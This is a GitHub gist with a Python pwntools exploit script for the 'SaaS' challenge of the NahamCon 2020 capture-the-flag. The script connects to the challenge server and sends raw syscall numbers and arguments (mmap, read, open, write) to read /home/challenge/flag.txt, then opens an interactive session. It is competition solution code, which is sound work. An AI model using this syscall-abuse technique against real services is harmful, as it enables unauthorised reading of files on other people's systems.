Skip to content

Instantly share code, notes, and snippets.

@lionaneesh
Created June 14, 2020 09:41
Show Gist options
  • Save lionaneesh/fa92dd263d8fc289fb6818e970f3da29 to your computer and use it in GitHub Desktop.
Save lionaneesh/fa92dd263d8fc289fb6818e970f3da29 to your computer and use it in GitHub Desktop.
SaaS from NahamCon 2020
from pwn import *
r = remote('jh2i.com', 50016)
#r = process('./saas')
def syscall(a2):
print ("syscall", a2)
for a in a2:
txt = r.recv(timeout=2).strip()
print (txt.strip(), len(txt))
r.sendline(str(a))
def mmap():
args = [9, 4096, 1024, 7, 34, 0, -1]
syscall(args)
def read(s = "/home/challenge/flag.txt\0"):
args = [0, 0, 0x10000, len(s), 0, 0, 0]
syscall(args)
r.sendline(s)
def write(addr = 0x10100, fd = 1):
args = [1, fd, addr, 0x400, 0,0,0]
syscall(args)
abc = r.recv(timeout=2)
print (abc.replace("\x00", ""), len(abc))
def op3n(addr = 0x10000):
args = [2, addr, 0, 0, 0,0,0]
syscall(args)
def opendir(addr = 0x10000):
args = [2, addr, 65536, 0, 0, 0, 0]
syscall(args)
def readfile(addr=0x10100, fd = 6):
args = [0, fd, addr, 0x400, 0, 0, 0]
syscall(args)
def getdents(fd = 6, addr = 0x10100, count = 0x400):
args = [78, fd, addr, count, 0, 0,0]
syscall(args)
def getcwd(addr=0x10200):
args = [79, addr, 0x100, 0,0,0,0]
syscall(args)
raw_input("checkpoint")
mmap()
read()
#opendir()
#getdents()
op3n()
readfile()
#getcwd()
write()
r.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment